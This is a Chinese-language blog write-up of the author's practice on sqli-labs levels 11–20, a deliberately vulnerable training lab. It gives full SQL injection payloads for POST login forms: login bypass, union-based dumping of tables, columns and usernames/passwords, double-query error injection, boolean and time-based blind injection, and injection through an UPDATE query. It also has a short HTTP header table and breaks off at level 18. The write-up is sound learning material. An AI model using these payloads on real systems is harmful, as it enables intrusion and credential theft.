sqli-labs训练(less11-20)
以前搁置下来的sql训练,重新捡起
SQLi-labs训练(less11-20)
less-11-error based-string
首先随便测试一下username=123' password=123通过post传递进去,然后就报错,来看报错'123' LIMIT 0,1'
那么就可以猜测后台sql语句为select username,password from table where username='xx' and password='xx'
语句晓得了,就好搞了,拿个单引号把前面那个单引号闭合
可以用uname=123' or 1=1 -- &passwd=123&submit=submit来登录绕过
下面构造语句
爆数据库和版本
uname=123' union select database(),version()# &passwd=123&submit=submit
请输入图片描述爆表名
uname=123' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()# &passwd=123&submit=submit
请输入图片描述爆列名
uname=123' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'# &passwd=123&submit=submit
请输入图片描述最后爆数据
uname=123' union select username,password from users limit 0,1# &passwd=123&submit=submit
](http://www.gsuhy.cn/usr/uploads/2020/11/2030706906.png "")
Less-12- Error Based- Double quotes- String
这个跟less11差不多,只不过多加了双引号和括号,也就是说他的后台sql语句为select username,password from table where username=(“username”) and password=(“password”)
所以绕过也就很简单,就是上面的单引号换成双引号和括号闭合,其他都一样
Less-13- Double Injection- String- with twist
啥?twist是啥,打扰了英语不好,查一波才知道是~这个,但是,用username=123' password=123试,报错的是'123') LIMIT 0,1'
那么这个后台的sql语句不就还是select * from table where username=(‘inputuser’) and password=(‘inputpass’),那就用')
payload
爆数据库
uname=123') and (select 1 from (select count(*),(concat("~",database(),"~",floor(rand()*2)))name
from information_schema.tables group by name)b) #&passwd=&submit=Submit
爆表
uname=123') and (select 1 from (select count(*),(concat("~",(select table_name from
information_schema.tables where table_schema=database() limit 0,1),"~",floor(rand()*2)))name
from information_schema.tables group by name)b) #&passwd=&submit=Submit
爆完
uname=123') and (select 1 from (select count(*),(concat("~",(select username from users
limit 0,1),"~",floor(rand()*2)))name from information_schema.tables group by name)b)
#&passwd=&submit=Submitless-14
跟less-13差不多,只不过把')改为了双引号
`uname=123” and (select 1 from (select count(),(concat("~",database(),"~",floor(rand()2)))name from
information_schema.tables group by name)b) #&passwd=&submit=Submit `
less-15-布尔盲注
盲注,其实就是靠猜,猜ascii的值
猜数据库长度(前台)
1′ or length(database())=8#
然后猜库名
uname=1' or (select ascii(substr(database(),1,1)) > 100)#&passwd=&submit=Submit
通过返回正确或者错误,最后猜出来的ascii值在110-120之间(虽然晓得数据库名,小声bb)
然后猜表名
uname=1' or (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) > 100)#&passwd=&submit=Submit
后面都没啥区别啦,步骤都是一样的就不多说了,最后得到用户名Dump
less-16-时间盲注
通过前面的经历,得:前一个是单引号,那么下一个就是双引号。
so,try:uname=123”) or (sleep(1)=0)#&passwd=123&submit=Submit 一秒后返回正确界面,right
然后就继续猜吧
大致上是差不多的
猜数据库
uname=") or (select if(ascii(substr(database(),1,1)) > 100,sleep(1)=0,NULL)) #&passwd=admin&submit=Submit
猜表名
uname=123") or (select if((ascii(substr((select table_name from information_schema.tables where
table_schema=database() limit 0,1),1,1)) > 100),sleep(1)=0,0)) #&passwd=admin&submit=Submit
猜字段
uname=123") or (select if((ascii(substr((select column_name from information_schema.columns where
table_name='users' limit 0,1),1,1)) > 100),sleep(1)=0,0)) #&passwd=admin&submit=Submit
猜数据
uname=123") or (select if((ascii(substr((select username from users limit 0,1),1,1)) > 50),sleep(1)=0,0))
#&passwd=admin&submit=Submitless-17-update
在前台测试一下,会发现会更新密码,其实感觉sql语句就很好猜了,就是很简单的update语句(其实是因为这里是page-1),然后就可以构造payload
uname=admin&passwd=123' and (select 1 from (select count(*),(concat("~",database(),"~",floor(rand()*2)))name from information_schema.tables group by name)b) #&submit=Submit
uname=admin&passwd=123' AND (select 1 from (select count(*),(concat("~",(select table_name from information_schema.tables where table_schema=database() limit 0,1),"~",floor(rand()*2)))name from information_schema.tables group by name)b)#&submit=Submit
uname=admin&passwd=123' AND (select 1 from (select count(*),(concat("~",(select column_name from information_schema.columns where table_name='users' limit 0,1),"~",floor(rand()*2)))name from information_schema.tables group by name)b) #&submit=Submit
uname=admin&passwd=123' AND (select 1 from (select count(*),(concat("~",(select username from users limit 0,1),"~",floor(rand()*2)))name from information_schema.tables group by name)b) #&submit=Submit
less-18&less-19
关于HTTP Header位置的注入,然后是insert类型,可以通过利用报错注入的方式获取数据。
先说一下什么是HTTP Header吧
HTTP Headerrr
HTTP大家都知道,超文本传输协议嘛,目前网页传输的的通用协议。HTTP协议采用了请求/响应模型,浏览器或其他客户端发出请求,服务器给与响应。就整个网络资源传输而言,包括message-header和message-body两部分。首先传递message- header,即http header消息 。http header 消息通常被分为4个部分:general header, request header, response header,
entity header。但是这种分法就理解而言,感觉界限不太明确。根据维基百科对http header内容的组织形式,大体分为Request和Response两部分。我们所要关注的就是Request部分
不过由于太多了,这里只写一些常见的。
| Header | 注释 | example |
|---|---|---|
| Accept-Encoding | 指定浏览器可以支持的web服务器返回内容压缩编码类型。 | Accept-Encoding: compress, gzip |
| Cookie | HTTP请求发送时,会把保存在该请求域名下的所有cookie值一起发送给web服务器。 | Cookie: $Version=1; Skin=new; |
| Content-Type | 请求的与实体对应的MIME信息 | Content-Type: application/x-www-form-urlencoded |
| Host | 指定请求的服务器的域名和端口号 | Host: www.xxx.com |
| Referer | 先前网页的地址,当前请求网页紧随其后,即来路 | Referer: http://www.xxx.com/index.html |
| User-Agent | User-Agent的内容包含发出请求的用户信息 | User-Agent: Mozilla/5.0 (Linux; X11) |
less-18
还是老规矩,前台测试一下,但是这里我遇到了一点问题,不论是用admin登录也好,还是其他也好,都无法登录,按照源码上的应该会输出user-agent,然后也有的说用Tamper Data,试了一下也没啥反应,emmm先放着吧,先过。我觉得可能是我用户名和密码有问题,网上说的用户名和密码就是admin,但是我输入admin却是login faild.............
包括less-20也是,可能是玄学吧
算了算了,明天再说,先睡了 狗命要紧